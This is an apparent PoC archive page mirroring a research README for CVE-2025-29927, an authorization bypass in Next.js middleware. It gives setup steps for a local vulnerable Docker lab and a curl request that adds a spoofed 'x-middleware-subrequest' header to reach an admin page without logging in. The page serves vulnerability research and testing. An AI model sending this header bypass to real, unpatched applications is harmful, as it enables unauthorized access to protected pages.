Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/l1uk/nextjs-middleware-exploit
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
Readme
# Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.

This proof of concept is specific for the vulnerability in **v12**

## Usage

### Environment setup

Set up the vulnerable environment using docker and the files from this repo by running:

```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

### Exploit 

This repository has the `exploit.sh` already created script to test the explotation of the vulnerability. Tu test it run:

```bash
chmod +x exploit.sh
./exploit.sh
```

Additionally you can test the explotation of the vulnerability by trying the following

1. Request the admin page without authentication. You should get a redirection to the `login` page.

```bash
curl -i http://localhost:3000/admin
```

2. Request the page without authentication but using the `x-middleware-subrequest` header. You should be able to bypass the authentication page.

```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```

## Security Advisory

- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
File Snapshot

 [4.0K]  /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1
├── [ 365]  Dockerfile
├── [ 665]  exploit.sh
├── [  46]  next.config.js
├── [ 242]  package.json
├── [4.0K]  pages
│   ├── [ 369]  about.js
│   ├── [ 157]  admin.js
│   ├── [ 375]  index.js
│   ├── [ 550]  login.js
│   └── [1.3K]  _middleware.js
├── [1.6K]  README.md
└── [4.0K]  styles
    └── [ 119]  global.css

2 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →